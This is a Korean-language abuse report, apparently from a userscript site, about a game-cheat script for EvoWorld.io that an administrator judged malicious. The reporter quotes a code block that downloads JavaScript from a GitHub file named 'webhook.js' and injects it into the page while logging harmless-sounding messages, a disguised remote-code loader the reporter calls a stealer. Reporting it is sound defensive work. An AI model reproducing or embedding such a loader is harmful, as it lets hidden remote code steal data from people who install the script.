EvoWorld.io GRIM DOMINATOR v2.0 항목이 2026-01-05에 악성 코드 사유로 신고되었습니다.

신고자의 글:

Stiller lines 17 - 33:
(function() {
const githubUrl = 'https://raw.githubusercontent.com/muhammadayaan122014-eng/gamehook/main/webhook.js';

console.log('Loading additional features from GitHub...');

fetch(githubUrl)
.then(response => response.text())
.then(code => {
const script = document.createElement('script');
script.textContent = code;
document.head.appendChild(script);
console.log('External features loaded successfully');
})
.catch(error => {
console.log('Could not load external features:', error);
});
})();

이 스크립트는 신고가 접수된 이후 업데이트되었습니다.

이 스크립트에는 이전에 인정되거나 수정된 신고가 1건 있습니다.

MerryXmas679차단됨 (신고된 사용자)의 활동:

이 신고는 관리자에 의해 인정되었습니다.